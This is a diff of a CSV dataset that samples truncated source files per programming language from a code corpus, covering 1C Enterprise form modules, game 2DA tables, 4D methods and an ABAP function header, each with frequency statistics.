diff --git "a/stackv2_languages_freq.csv" "b/stackv2_languages_freq.csv" --- "a/stackv2_languages_freq.csv" +++ "b/stackv2_languages_freq.csv" @@ -1,226 +1,263 @@ "blob_id","filename","extension","language","content","lang_ext_count","ext_fraction_per_lang","generated_fraction","vendor_fraction" -"135116c04b9409f582e4764c76f8508b1c9d6165","ManagerModule.bsl",".bsl","1C Enterprise"," -#Если Сервер Или ТолстыйКлиентОбычноеПриложение Или ВнешнееСоединение Тогда +"126cb38a1618a411b7cef36f3a04dd00a82accec","Module.bsl",".bsl","1C Enterprise"," +#Область ОбработчикиСобытийФормы -#Область ПрограммныйИнтерфейс +&НаСервере +Процедура ПриСозданииНаСервере(Отказ, СтандартнаяОбработка) -// Возвращает ошибки заполнения настроек элементов схемы. -// -// Параметры: -// Схема - СправочникСсылка.СхемыКомплексныхПроцессов, -// СправочникОбъект.СхемыКомплексныхПроцессов - ссылка или объект схемы. -// -// Возвращаемое значение: -// Массив -// * Строка -// -Функция ОшибкиЗаполненияНастроекЭлементовСхемы(Схема) Экспорт - - УстановитьПривилегированныйРежим(Истина); - - ОшибкиНастроек = Новый Массив; - - Если ТипЗнч(Схема) = Тип(""СправочникСсылка.СхемыКомплексныхПроцессов"") Тогда - СхемаОбъект = Схема.ПолучитьОбъект(); - Иначе - СхемаОбъект = Схема; + // Пропускаем инициализацию, чтобы гарантировать получение формы при передаче параметра ""АвтоТест"". + Если Параметры.Свойство(""АвтоТест"") Тогда + Возврат; КонецЕсли; + + Параметры.Свойство(""Идентификатор"", Идентификатор); + Параметры.Свойство(""ДрайверОборудования"", ДрайверОборудования); - ГрафическаяСхема = СхемаОбъект.Схема.Получить(); + Заголовок = НСтр(""ru='Оборудование:'"") + Символы.НПП + Строка(Идентификатор); - // Найдем имена первых действия после старта. - ИмяЭлементаСтарта = СхемаОбъект.ЭлементыСхемы.Найти( - Перечисления.ТипыЭлементовСхемыКомплексногоПроцесса.Старт, ""Тип"").Имя; - ИменаДействийПослеСтарта = Новый Массив; - НайтиИменаПосл","772","0.9357575757575758","0.0","0.0" -"0941b036dfd34cb3af2be75b6fc47b6e4d9f6b47","Module.bsl",".bsl","1C Enterprise","// 4D:ERP для Беларуси -// { -// Форма изменена -// } -// 4D - -#Область ОбработчикиСобытийФормы - -&НаСервере -Процедура ПриСозданииНаСервере(Отказ, СтандартнаяОбработка) - - Если Параметры.Свойство(""АвтоТест"") Тогда // Возврат при получении формы для анализа. - Возврат; - КонецЕсли; - - УправлениеЭлементами() - -КонецПроцедуры - -&НаКлиенте -Процедура ОбработкаОповещения(ИмяСобытия, Параметр, Источник) - - Если ИмяСобытия = ""Запись_НаборКонстант"" Тогда - // Изменены настройки программы в панелях администрирования - УправлениеЭлементами(); - КонецЕсли; - -КонецПроцедуры - -#КонецОбласти + ЦветТекста = ЦветаСтиля.ЦветТекстаФормы; + ЦветОшибки = ЦветаСтиля.ЦветОтрицательногоЧисла; + + СписокПорт = Элементы.Порт.СписокВыбора; + СписокПорт.Добавить(100, НСтр(""ru='<Клавиатура>'"")); + Для Индекс = 1 По 64 Цикл + СписокПорт.Добавить(Индекс, ""COM"" + СокрЛП(Индекс)); + КонецЦикла; + + СписокСкорость = Элементы.Скорость.СписокВыбора; + СписокСкорость.Добавить(1, ""300""); + СписокСкорость.Добавить(2, ""600""); + СписокСкорость.Добавить(3, ""1200""); + СписокСкорость.Добавить(4, ""2400""); + Список","792","0.8989784335981839","0.0","0.0" +"0f4e5b38caf969306c08093e8a0957afb231f1d6","Module.bsl",".bsl","1C Enterprise","//////////////////////////////////////////////////////////////////////////////// +// Обновление информационной базы ERM. +// +//////////////////////////////////////////////////////////////////////////////// -#Область ОбработчикиКомандФормы +#Область ПрограммныйИнтерфейс -#Область ОбщиеСправочники +//////////////////////////////////////////////////////////////////////////////// +// Сведения о библиотеке (или конфигурации). -&НаКлиенте -Процедура ОткрытьСправочникВидыДоходовНДФЛ(Команда) +// См. описание в общем модуле ОбновлениеИнформационнойБазыБСП. +Процедура ПриДобавленииПодсистемы(Описание) Экспорт - ОткрытьФорму(""Справочник.ВидыДоходовНДФЛ.ФормаСписка"", , ЭтаФорма); - -КонецПроцедуры - -&НаКлиенте -Процедура ОткрытьРегистрСведенийВычетыКДоходамПоНДФЛ(Команда) + Описание.Имя = Метаданные.Имя; + Описание.Версия = Метаданные.Версия; - ОткрытьФорму(""РегистрСведений.ВычетыПоДоходамНДФЛ.ФормаСписка"", , ЭтаФорма); + // Требуется библиотека стандартных подсистем. + Описание.ТребуемыеПодсистемы.Добавить(""СтандартныеПодсистемы""); КонецПроцедуры -&НаКлиенте -Процедура ОткрытьСправочникВиды","772","0.9357575757575758","0.0","0.0" -"09c7c56bcae626e1183a9b420ee4727f371f887c","Module.bsl",".bsl","1C Enterprise"," -#Область ПрограммныйИнтерфейс - -&НаКлиенте -Процедура ОповещениеОткрытьФормуВопроса(РезультатОткрытияФормы, ДополнительныеПараметры) Экспорт - Если НЕ РезультатОткрытияФормы = Неопределено Тогда - Если ВРЕГ(РезультатОткрытияФормы) = ""ДА"" Тогда - ЗакрытьСПередачейРезультата(); - КонецЕсли; - КонецЕсли; - ПервыйВвод = Истина; -КонецПроцедуры - -#КонецОбласти - -#Область ОбработчикиСобытийФормы +//////////////////////////////////////////////////////////////////////////////// +// Обработчики обновления информационной базы. -&НаСервере -Процедура ПриСозданииНаСервере(Отказ, СтандартнаяОбработка) - - // Пропускаем инициализацию, чтобы гарантировать получение формы при передаче параметра ""АвтоТест"". - Если Параметры.Свойство(""АвтоТест"") Тогда - Возврат; - КонецЕсли; - - КоличествоСимволовПослеЗапятой = 2; - ПервыйВвод = Истина; - - Если Параметры.Свойство(""ФорматироватьСтроку"") Тогда - ФорматироватьСтроку = Параметры.ФорматироватьСтроку; - КонецЕсли; - - Если Параметры.Свойство(""Заголовок"") Тогда - Заголовок = Параметры.Заголовок; - КонецЕсли; - - Если Параметры.Свойство(""МаксимальноеЗначение"") Тогда - МаксимальноеЗначение = Параметры.Ма","772","0.9357575757575758","0.0","0.0" -"04831926e338a8e8b81d6a4ad7427e65da887886","RecordSetModule.bsl",".bsl","1C Enterprise","#Если Сервер Или ТолстыйКлиентОбычноеПриложение Или ВнешнееСоединение Тогда - -#Область ОбработчикиСобытий +// Добавляет в список процедуры-обработчики обновления данных ИБ +// для всех поддерживаемых версий библиотеки или конфигурации. +// Вызывается перед началом обновления данных ИБ для пост","792","0.8989784335981839","0.0","0.0" +"0607bc0930476fb9392f09e657cf974860b5d8bc","Module.bsl",".bsl","1C Enterprise","//////////////////////////////////////////////////////////////////////////////// +// ОБРАБОТЧИКИ СОБЫТИЙ ФОРМЫ -Процедура ПередЗаписью(Отказ, Замещение) +&НаСервере +Процедура ПриСозданииНаСервере(Отказ, СтандартнаяОбработка) - Если ЗарплатаКадры.ОтключитьБизнесЛогикуПриЗаписи(ЭтотОбъект) Тогда - Возврат; + Если Параметры.Ключ.Пустая() Тогда + ПодготовитьФормуНаСервере(); + КонецЕсли; + + Если Параметры.Свойство(""ИзменитьВидОперации"") Тогда + ИзменитьВидОперации = Истина; КонецЕсли; - РегистрыСведений.УдалитьИсторияИспользованияПодразделений.ДополнитьНаборИспользованиемВИерархии(ЭтотОбъект); - РегистрыСведений.УдалитьИсторияИспользованияПодразделений.СохранитьИзменениеИспользованияПодразделений(ЭтотОбъект); + // СтандартныеПодсистемы.ВерсионированиеОбъектов + ВерсионированиеОбъектов.ПриСозданииНаСервере(ЭтотОбъект); + // Конец СтандартныеПодсистемы.ВерсионированиеОбъектов + +КонецПроцедуры + +&НаСервере +Процедура ПриЧтенииНаСервере(ТекущийОбъект) + + ПодготовитьФормуНаСервере(); КонецПроцедуры -#КонецОбласти +//////////////////////////////////////////////////////////////////////////////// +// ОБРАБОТЧИКИ КОМАНД ФОРМЫ -#КонецЕсли","772","0.9357575757575758","0.0","0.0" -"0d5a2970b46ee6adde8126727ed391fa00870e68","ManagerModule.bsl",".bsl","1C Enterprise"," -#Если Сервер Или ТолстыйКлиентОбычноеПриложение Или ВнешнееСоединение Тогда +&НаКлиенте +Процедура ОткрытьДокумент(Команда) + + СтрокаТаблицы = Элементы.СписокВидовОпераций.ТекущиеДанные; + + Если НЕ СтрокаТаблицы = Неопределено Тогда + + ОткрытьДокументВида(СтрокаТаблицы.Значен","792","0.8989784335981839","0.0","0.0" +"018ac456104b153918556ba846b437b8132b01a9","Module.bsl",".bsl","1C Enterprise","//начало текста модуля -#Область ПрограммныйИнтерфейс +/////////////////////////////////////////////////// +//Служебные функции и процедуры +/////////////////////////////////////////////////// -#Область ДляВызоваИзДругихПодсистем +&НаКлиенте +// контекст фреймворка Vanessa-Behavior +Перем Ванесса; + +&НаКлиенте +// Структура, в которой хранится состояние сценария между выполнением шагов. Очищается перед выполнением каждого сценария. +Перем Контекст Экспорт; + +&НаКлиенте +// Структура, в которой можно хранить служебные данные между запусками сценариев. Существует, пока открыта форма Vanessa-Behavior. +Перем КонтекстСохраняемый Экспорт; -// СтандартныеПодсистемы.УправлениеДоступом +&НаКлиенте +// Служебная функция. +Функция ДобавитьШагВМассивТестов(МассивТестов,Снипет,ИмяПроцедуры,ПредставлениеТеста = Неопределено,Транзакция = Неопределено,Параметр = Неопределено) + Структура = Новый Структура; + Структура.Вставить(""Снипет"",Снипет); + Структура.Вставить(""ИмяПроцедуры"",ИмяПроцедуры); + Структура.Вставить(""ИмяПроцедуры"",ИмяПроцедуры); + Структура.Вставить(""ПредставлениеТеста"",ПредставлениеТеста); + Структура.Вставит","792","0.8989784335981839","0.0","0.0" +"0620e7437bf9d37334dc1a0b1fc93ecd34e6833f","ManagerModule.bsl",".bsl","1C Enterprise"," +Функция ДокументЗарегестрированВПривязках(ДокументССылка) Экспорт + + Запрос = Новый Запрос; + Запрос.Текст = + ""ВЫБРАТЬ + | ВЫБОР + | КОГДА &ДокументСсылка В + | (ВЫБРАТЬ + | Привязки.Поступление КАК ЗаписиРегистра + | ИЗ + | РегистрСведений.Привязки КАК Привязки + | ГДЕ + | Привязки.Поступление = &ДокументСсылка + | + | ОБЪЕДИНИТЬ ВСЕ + | + | ВЫБРАТЬ + | Привязки.Реализация + | ИЗ + | РегистрСведений.Привязки КАК Привязки + | ГДЕ + | Привязки.Реализация = &ДокументСсылка) + | ТОГДА ИСТИНА + | ИНАЧЕ ЛОЖЬ + | КОНЕЦ КАК ЕстьДокументы""; + + Запрос.УстановитьПараметр(""ДокументСсылка"", ДокументСсылка); + + Результат = Запрос.Выполнить(); + + ВыборкаДетальныеЗаписи = Результат.Выбрать(); + + Если ВыборкаДетальныеЗаписи.Следующий() Тогда + Возврат ВыборкаДетальныеЗаписи.ЕстьДокументы; + КонецЕсли; -// См. УправлениеДоступомПереопределяемый.ПриЗаполненииСписковСОграничениемДоступа. -Процедура ПриЗаполненииОграниченияДоступа(Ограничение) Экспорт + Возврат Ложь; - Ограничение.Текст = - ""РазрешитьЧтение - |ГДЕ - | ИСТИНА - |; - |РазрешитьИзменениеЕслиРазрешеноЧтение - |ГДЕ - | ИзменениеОбъектаРазрешено(Взаимодействие)""; +КонецФункции + +Функция ВернутьСписокПриходовПоРеализации(ДокументСсылкаРеализация) Экспорт -КонецПроцедуры + СписокПоступлений = Новый СписокЗначений; +","792","0.8989784335981839","0.0","0.0" +"0fc5232c4aa785ebc20851051209ad47b226741b","zshrc.os",".os","1C Enterprise","export LS_COLORS='di=1;36:ln=1;35:so=1;32:pi=1;93:ex=1;31:bd=1;34;46:cd=1;34;103:su=1;37;41:sg=1;37;46:tw=1;37;42:ow=1;37;103:' +","48","0.05448354143019296","0.0","0.0" +"12ec9233ec535173d71c84915884e04c62c59466","js.os",".os","1C Enterprise","var runJSStringResult = runJSStringResult +var index = 0 + +var function importJSValue(ret){ + ret === ""ok::true"" && return true + ret === ""ok::false"" && return false + ret === ""ok::null"" && return null + var prefix = ret.sub(0, 9) + prefix === ""ok::str::"" && return ret.sub(9) + prefix === ""ok::num::"" && return toNumber(ret.sub(9)) + prefix === ""ok::obj::"" && return importJSObject(toNumber(ret.sub(9)), ""object"") + prefix === ""ok::fun::"" && return importJSObject(toNumber(ret.sub(9)), ""function"") + throw ret +} + +var exportValues = {} +var exportValuesByIndex = {} + +var function exportValue(value){ + var type = typeOf(value) + if(type == ""null"" || type == ""boolean"" || type == ""number"" || type == ""string""){ + return json.encode(value) + } + if(""__javaScriptObjectIndex__"" in value){ + return ""ObjectScriptInterface.getExportedValue(${value.__javaScriptObjectIndex__})"" + } + if(!(value in exportValues)){ + var index = #exportValues + exportValues[value] = index + exportValuesByIndex[index] = value + } + return ""Obj","48","0.05448354143019296","0.0","0.0" +"0316c1dda8630df2afad2fab0a837b3af3e04952","main.os",".os","1C Enterprise"," +#Использовать ""../internal/cmd"" +#Использовать cli -// Конец СтандартныеПодсистемы.УправлениеДоступом +#Область Приложение -#КонецОбласти +Процедура ВыполнитьПриложение() -#КонецОбласти + ИмяПриложения = ПараметрыПриложения.ИмяПриложения(); + ВерсияПриложения = ПараметрыПриложения.ВерсияПриложения(); -#Область СлужебныеПроцедурыИФункции + Приложение = Новый КонсольноеПриложение(ИмяПриложения, + ""Приложение для работы с покрытием кода 1С:Предприятия""); + + Приложение.Версия(""version"", ВерсияПриложения); -//////////////////////////////////////////////////////////////////////////////// -// Обработчики обновления + Приложение.ДобавитьКоманду(""start"", ""Начать запись покрытия"", Новый КомандаСтарт()); + Приложение.ДобавитьКоманду(""stop"", ""Остановить запись покрытия"", Новый КомандаСтоп()); + Приложение.ДобавитьКоманду(""convert"", ""Конвертировать результаты покрытия"", Новый КомандаКонвертировать()); + Приложение.ДобавитьКоманду(""lines"", ""Получить файлы которые надо покрыть тестами"", Но��ый КомандаСтрокиПокрытия()); + Приложение.ДобавитьКоманду(""report"", ""Сформировать отчет покрытия"", Новый КомандаОтчетПокрытия()); + + Приложение.Опция(""d debug"", Ложь, ""Режим отладки"") + .ТБулево(); -// Процедура обновления ИБ для версии БСП 2.2. -// Переносит Рассмотрено и РассмотретьПосле из реквизитов документов взаимодействий в регистр сведений -// ПредметыПапкиВзаимодействий. -// -Процедура ОбновитьХранениеРассмотреноРассмотретьПосле_2_2_0_0(Параметры) Экспор","772","0.9357575757575758","0.0","0.0" -"146b650242d68c7955671903d15f5e61deca4bab","СоответствияНазванийВидовОбъектов.os",".os","1C Enterprise","Перем СоответствияНазванийВидовОбъектов; - -Функция СоответствияНазванийВидовОбъектовИнициализировать() - - Если ТипЗнч(СоответствияНазванийВидовОбъектов) = Тип(""ТаблицаЗначений"") Тогда - Возврат СоответствияНазванийВидовОбъектов; - КонецЕсли; - - СоответствияНазванийВидовОбъектов = Новый ТаблицаЗначений; - СоответствияНазванийВидовОбъектов.Колонки.Добавить(""Группа""); - СоответствияНазванийВидовОбъектов.Колонки.Добавить(""ИмяАнгл""); - СоответствияНазванийВидовОбъектов.Колонки.Добавить(""ИмяАнглМнФормы""); - СоответствияНазванийВидовОбъектов.Колонки.Добавить(""Имя""); - СоответствияНазванийВидовОбъектов.Колонки.Добавить(""ИмяМнФормы""); - - СтрокаСоответствия = СоответствияНазванийВидовОбъектов.Добавить(); - СтрокаСоответствия.Группа = """"; - СтрокаСоответствия.ИмяАнгл = ""Constant""; - СтрокаСоответствия.ИмяАнглМнФормы = ""Constants""; - СтрокаСоответствия.Имя = ""Константа""; - СтрокаСоответствия.ИмяМнФормы = ""Константы""; - - СтрокаСоответствия = СоответствияНазванийВи","52","0.06303030303030303","0.0","0.0" -"1305d62d99c2fb50385ff6fb840adbf53a65d859","_CLF_P_ProcEnd_SIMChg.os",".os","1C Enterprise"," - - - - - - - - - - - - - - - - - - "","" "","""",}),0,({({""You snuzzle $hcname$."",""$mcname$ snuzzle$s$ $hcname$."",""$mcname$ snuzzle$s$ you."",0,0,0,}),({""You snuzzle $hcname$ $arg$."",""$mcname$ snuzzle$s$ $hcname$ $arg$."",""$mcname$ snuzzle$s$ you $arg$."",({""affectionately"",""warmly"",""gently"",""absentmindedly"",""seductively"",""dreamily"",""adorably"",""lustily"",""tenderly"",""lovingly"",""sensuously"",""longingly"",""softly"",""passionately"",""excitedly"",""snuzzily"",""snuzzably"",""on a coffee table"",""#"",}),0,0,}),}),})","52","0.06303030303030303","0.0","0.0" -"04c296cdac9ebecd807a2dcbdec5f9bb735bbbec","SODCLTXT.2DA",".2da","2-Dimensional Array","2DA V1.0 --1 - CLASSID KITID LOWER DESCSTR MIXED BIOGRAPHY FALLEN BRIEFDESC -FIGHTER 2 16384 7201 9556 1076 65344 0 31252 -BERSERKER 2 1 24239 24284 24261 65344 0 31252 -WIZARD_SLAYER 2 2 24240 24285 24262 65344 0 31252 -KENSAI 2 3 24241 24286 24263 65344 0 31252 -DWARVEN_DEFENDER 2 34 31973 31975 ","54","1.125","0.0","0.0" -"07969879bdeab1096545a683daa265e96377dcad","cls_feat_drslyr.2da",".2da","2-Dimensional Array","2DA V2.0 - - FeatLabel FeatIndex List GrantedOnLevel OnMenu -0 FEAT_DRAGONSONG_STRENGTH 3441 3 1 1 -1 FEAT_DRAGONSONG_COMPULSION 3442 3 2 1 -2 FEAT_DRAGONSONG_SPEED 3443 3 3 1 -3 FEAT_DRAGONSONG_FEAR 3444 3 4 1 -4 FEAT_DRAGONSONG_HEALING 3445 3 5 1 -5 FEAT_LYRITHSONG2 3447 3 2 1 -6 FEAT_LYRITHSONG3 3448 3 3 1 -7 FEAT_LYRITHSONG4 3449 3 4 1 -8 FEAT_LYRITHSONG5 3450 3 5 1 -9 FEAT_LYRITHSONG7 3016 3 7 1 -10 FEAT_LYRITHSONG8 3017 3 8 1 -11 FEAT_LYRITHSONG9 ","54","1.125","0.0","0.0" -"1e61f0e2eba9a5107b3003672dd225e8c8c417cd","iprp_redcost.2da",".2da","2-Dimensional Array","2DA V2.0 - - Name Label Cost Value GS_IP_DISABLED -0 **** Random 0 0.0 **** -1 1658 -20% 0.5 0.2 TRUE -2 1659 -40% 0.75 0.4 TRUE -3 1660 -60% 1.0 0.6 TRUE -4 1661 -80% 1.25 0.8 TRUE -5 1662 -100% 1.5 1.0 TRUE","54","1.125","0.0","0.0" -"0eea13c5404f310aba665e7409d16e16b471c3d4","modal.2da",".2da","2-Dimensional Array","2DA V1.0 + Результат = ГенераторТестов.ПолучитьСписокМетодовБезТ","48","0.05448354143019296","0.0","0.0" +"0ff9f9679de50afcc0e1e3ba55a4097cf0a72c13","ireq_bolt0003.2da",".2da","2-Dimensional Array","2DA V2.0 + + LABEL ReqType ReqParam1 ReqParam2 +0 Bolt_+3 RESULT nw_wammbo010 **** +1 Caster_Level_9th CASTERLVL 9 **** +2 CraftArmsandArmor FEAT 2926 **** +","36","0.6792452830188679","0.0","0.0" +"18659971bfe4bab6c97deeab9bff9ef2bd00821f","defsound.2da",".2da","2-Dimensional Array","2DA V1.0 * - SPELL ACTION STR_ON STR_OFF STR_FAIL AOESPELL REPEAT_MSG -NONE * * 0 0 0 0 0 -BARDSONG BARDSONG BattleSong -1 -1 -1 1 1 -DETECTTRAPS FINDTRAP FindTraps -1 -1 -1 0 0 -STEALTH SNEAK Hide 19944 4188 17120 0 0 -TURNUNDEAD TURN Turn -1 -1 -1 1 1 -","54","1.125","0.0","0.0" -"003e4954c6b7a9ad8861bfcd8acb82909e423eed","RACETHAC.2DA",".2da","2-Dimensional Array","2DA V1.0 + RESREF +OPEN AMB_D03A +CLOSE AMB_D03B +HOPEN AMB_D04A +HCLOSE AMB_D04B +BUTTON1 GAM_09 +BUTTON2 GAM_03 +BUTTON3 GAM_04 +OPENFAIL AMB_D20 +CLOSEFAIL * +ITEM_GONE EFF_M02 +SECRET ACT_09 +PICKLOCK AMB_D21D +PICKFAIL AMB_D21 +13 * +14 * +15 * +16 * +17 * +18 * +19 * +LIGHTNING1 AMB_E13A +LIGHTNING2 AMB_E13B +LIGHTNING3 AMB_E13F +RAIN AMB_E11 +SNOW AMB_E02B +SOLD ACT_03D +STOLEN GAM_36 +DRUNK GAM_07 +DONATE1 ACT_03 +DONATE2 ACT_03E +IDENTIFY CAS_P04 +GOTXP * +TOOLTIP G_PAPR1 +","36","0.6792452830188679","0.0","0.0" +"13ecccc2cbc220bac5c267aa2f9bd6ddf59f63ae","baseitems.2da",".2da","2-Dimensional Array","2DA V2.0 + + Name label InvSlotWidth InvSlotHeight EquipableSlots CanRotateIcon ModelType ItemClass GenderSpecific Part1EnvMap Part2EnvMap Part3EnvMap DefaultModel DefaultIcon Container WeaponWield WeaponType WeaponSize RangedWeapon PrefAttackDist MinRange MaxRange NumDice DieToRoll CritThreat CritHitMult Category BaseCost Stacking ItemMultiplier Description InvSoundType MaxProps MinProps PropColumn StorePanel ReqFeat0 ReqFeat1 ReqFeat2 ReqFeat3 ReqFeat4 AC_Enchant BaseAC ArmorCheckPen BaseItemStatRef ChargesStarting RotateOnGround TenthLBS WeaponMatType AmmunitionType QBBehaviour ArcaneSpellFailure %AnimSlashL %AnimSlashR %AnimSlashS StorePanelSort ILRStackSize +0 106 shortsword 1 2 0x1C030 1 2 WSwSs 0 1 1 1 it_bag iwswss 0 **** 1 2 **** 1.2 10 255 1 6 ","36","0.6792452830188679","0.0","0.0" +"083818d3d3f78462484e429896500f7c2cf62a45","phenotype.2da",".2da","2-Dimensional Array","2DA V2.0 + + Label Name DefaultPhenoType Constant +0 Normal 2223 0 PHENOTYPE_NORMAL +1 Skinny **** 0 **** +2 Large 2225 0 PHENOTYPE_BIG +3 Normal_M 111015 0 PHENOTYPE_CUSTOM1 +4 **** **** 0 PHENOTYPE_CUSTOM2 +5 Large_M 111016 2 PHENOTYPE_CUSTOM3 +6 N_Joust_M 111017 0 PHENOTYPE_CUSTOM4 +7 **** **** 0 PHENOTYPE_CUSTOM5 +8 L_Joust_M 111018 2 PHENOTYPE_CUSTOM6 +9 NULL7 **** 0 PHENOTYPE_CUSTOM7 +10 NULL8 **** 0 PHENOTYPE_CUSTOM8 +11 NULL9 ","36","0.6792452830188679","0.0","0.0" +"01ab1fa00a39373e3486d465e0146b967b7e6813","feats.2da",".2da","2-Dimensional Array","2DA V1.0 0 - LABEL HUMAN DWARF ELF GNOME HALF_ELF HALFLING HALFORC -89 BASTARDSWORD 0 0 0 0 0 0 0 -90 LONGSWORD 0 0 2 0 0 0 0 -91 SHORTSWORD 0 0 2 0 0 0 0 -92 AXE 0 2 0 0 0 ","54","1.125","0.0","0.0" -"0028a94fe6841d93fd626eb853bb3107c4563626","firstName.4dm",".4dm","4D","$evt:=Form event code:C388 -$animationTypes_ptr:=OBJECT Get pointer:C1124(Object named:K67:5;""animationTypes"") - -Case of - : ($evt=On Load:K2:1) - Form:C1466.firstNameLabel:=New Animation - Form:C1466.firstNameLabel.target:=""firstName"" - Form:C1466.firstNameLabel.fontSize:=11 - Form:C1466.firstNameLabel.offset:=-5 - Form:C1466.firstNameLabel.formPath:=""firstName"" -End case - -Form:C1466.firstNameLabel.duration:=Form:C1466.duration -Form:C1466.firstNameLabel.animationType:=$animationTypes_ptr->{$animationTypes_ptr->} - -Form:C1466.firstNameLabel.floatingLabel()","73","1.0","0.0","0.0" -"070fbe4076c18985d4c76b75ef47f69a0777d97b","bDel.4dm",".4dm","4D","C_TEXT:C284($varName) -C_LONGINT:C283($table;$field) - -RESOLVE POINTER:C394(Focus object:C278;$varName;$table;$field) +ID NAMEREF DESCREF BBN BRD CLR DRD FTR MNK PAL RGR ROG SOR WIZ C_ILMATER C_LATHANDER C_SELUNE C_HELM C_OGHMA C_TEMPUS C_BANE C_MASK C_TALOS HUMAN AASIMAR TIEFLING ELF DROW WILD_ELF DWARF GOLD_DWARF GRAY_DWARF HALFLING STRONGHEART_HALFLLING GHOSTWISE_HALFLING GNOME DEEP_GNOME HALF_ELF HALF_ORC +AEGIS_OF_RIME 0 ","36","0.6792452830188679","0.0","0.0" +"0ec69ad50a941b3625e4897f24ee0fa0686e338f","vlXS_BrowserTab.4dm",".4dm","4D","$tab:=Selected list items:C379(vlXS_BrowserTab) +GET LIST ITEM:C378(vlXS_BrowserTab;$tab;vlBWR_SelectedTableRef;vsBWR_selectedTableName) +yBWR_currentTable:=Table:C252(vlBWR_SelectedTableRef) //pointer to the default table displayed in browser + +USR_RegisterUserEvent (UE_TabSelection;vlBWR_SelectedTableRef) + +REDUCE SELECTION:C351(yBWR_currentTable->;0) +BWR_PanelSettings +BWR_SelectTableData + +XS_SetInterface +ALP_SetInterface (xALP_Browser) +","85","1.0897435897435896","0.0","0.0" +"0f20fd8df54f76bbb1b93aa141610e6879ffab59","xALP_ACT_CB_ItemsVenta.4dm",".4dm","4D","//%attributes = {} + //xALP_ACT_CB_ItemsVenta + +C_BOOLEAN:C305($0) +C_LONGINT:C283($1;$2;$3) + +If ($2=8) //soft deselect + $0:=False:C215 +Else + $0:=True:C214 + AL_GetCurrCell (ALP_ItemsVentaRapida;vCol;vRow) + + If (AL_GetCellMod (ALP_ItemsVentaRapida)=1) + Case of + : (vCol=1) + TRACE:C157 + //revisar si se debe cambiar arreglo + //20130626 RCH NF CANTIDAD + arACT_CantidadVVR{vRow}:=Round:C94(arACT_CantidadVVR{vRow};1) + $MontoDef:=Find in array:C230(alACT_IDVR;alACT_IDVVR{vRow}) + If ($MontoDef#-1) + If (arACT_MontoPesosVR{$MontoDef}>0) + arACT_TotalVVR{vRow}:=(arACT_CantidadVVR{vRow}*arACT_MontoPesosVR{$MontoDef})-arACT_DescuentoVVR{vRow} + End if + End if + : (vCol=3) + If ((arACT_DescuentoVVR{vRow}>=0) & (arACT_TotalVVR{vRow}>arACT_DescuentoVVR{vRow})) + $MontoDef:=Find in array:C230(alACT_IDVR;alACT_IDVVR{vRow}) + If ($MontoDef#-1) + If (arACT_MontoPesosVR{$MontoDef}>0) + arACT_TotalVVR{vRow}:=Round:C94((arACT_CantidadVVR{vRow}*arACT_","85","1.0897435897435896","0.0","0.0" +"0f2d6495d8ee322ebcf35ee7a4d7e0ce34de079c","00_Start.4dm",".4dm","4D","//%attributes = {} +C_LONGINT:C283($1) +C_LONGINT:C283($ps;$win) +C_OBJECT:C1216($options) +C_TEXT:C284($cr) Case of - : ($varName=""lbElectivas"") - DELETE FROM ARRAY:C228(aPEAsgName;aPEAsgName) + : (Count parameters:C259=0) + $ps:=New process:C317(Current method name:C684;0;Current method name:C684;0) - : ($varName=""lbObligatorias"") - DELETE FROM ARRAY:C228(aPCAsgName;aPCAsgName) + Else -End case - -","73","1.0","0.0","0.0" -"1ec51a40e520a2a9d0f2e4d747167b227c80ee9d","opcionesEnfermeria1.4dm",".4dm","4D","SN3_SetCheckByChecks (->cb_PublicarEnfermeria;""|"";->cb_PublicarVisitas;->cb_PublicarCM)","73","1.0","0.0","0.0" -"00f4dadc29d5a6e89e2739110e90d63e719fe2ad","RM_RefNClosed.4dm",".4dm","4D","//%attributes = {""publishedWeb"":true} - //G-Proc: RM_RefNClosed; RM stands for Reporting Month. - - // Status = ""Referred"" or ""Direct Assistance"" - - // - -C_LONGINT:C283($Insert) -C_TEXT:C284($1) -Case of - : ($1=""A"") - vAInt:=vAInt+1 - vARef:=vARef+1 - vAClosed:=vAClosed+1 - : (($1=""C"") | ($1=""V"")) // COMBINE VOM W/COMMUNITY - - vCInt:=vCInt+1 - vCRef:=vCRef+1 - vCClosed:=vCClosed+1 - : ($1=""F"") - vFInt:=vFInt+1 - vFRef:=vFRef+1 - vFClosed:=vFClosed+1 - : ($1=""J"") - vJInt:=vJInt+1 - vJRef:=vJRef+1 - vJClosed:=vJClosed+1 - : ($1=""L"") - vLInt:=vLInt+1 - vLRef:=vLRef+1 - vLClosed:=vLClosed+1 - : ($1=""T"") // TRUANT - 12/2003 - - vTInt:=vTInt+1 - vTRef:=vTRef+1 - vTClosed:=vTClosed+1 - : ($1=""N"") //LTC - - vMInt:=vMInt+1 - vMRef:=vMRef+1 - vMClosed:=vMClosed+1 - // : ($1=""S"") - - // vSInt:=vSInt+1 - - // vSRef:=vSRef+1 - - //vSClosed:=vSClosed+1 ` 3/97 - ZERO SPECIAL ED - - : ($1=""P"") - vPInt:=vPInt+1 - ","73","1.0","0.0","0.0" -"0a6504444fa3357505dcfbbc321b598f930fca2b","REGEX_SubstituteText.4dm",".4dm","4D","//%attributes = {""invisible"":true,""preemptive"":""capable"",""published4DMobile"":{""scope"":""none""},""publishedSoap"":false,""publishedWeb"":false,""publishedWsdl"":false,""shared"":false,""publishedSql"":false,""executedOnServer"":false} - // ---------------------------------------------------- - // Method : REGEX_SubstituteText - // Created 28/09/07 by Vincent - // ---------------------------------------------------- - // Description - // Alias ""REGEX_SubstituteText"" - // ---------------------------------------------------- - // Paramètres - //$1 = Regular expression - //$2 = Replacement text - //$3 = Target text - //$4 = Regular expression flags - //$0 = Error result - // ---------------------------------------------------- -C_LONGINT:C283($0) -C_TEXT:C284($1) -C_TEXT:C284($2) -C_POINTER:C301($3) -C_LONGINT:C283($4) - -C_BOOLEAN:C305($Boo_OK) -C_LONGINT:C283($Lon_i;$Lon_Index;$Lon_Options;$Lon_Parameters;$Lon_Size;$Lon_Start) -C_TEXT:C284($Txt_Buffer;$Txt_Error_Method;$Txt_Pattern;$Txt_Replacement;$Txt_Target","73","1.0","0.0","0.0" -"17f6c3e51e7034f95413be69dd628b5d30a0cf1d","ydklist.fugr.ydk_list_for_instance.abap",".abap","ABAP","FUNCTION ydk_list_for_instance. -*""---------------------------------------------------------------------- -*""*""Local Interface: -*"" IMPORTING -*"" REFERENCE(INSTANCE) TYPE REF TO OBJECT -*"" REFERENCE(METHOD) TYPE CLIKE -*"" REFERENCE(COL) DEFAULT 5 -*"" REFERENCE(ROW) DEFAULT 5 -*"" REFERENCE(WIDTH) OPTIONAL -*"" 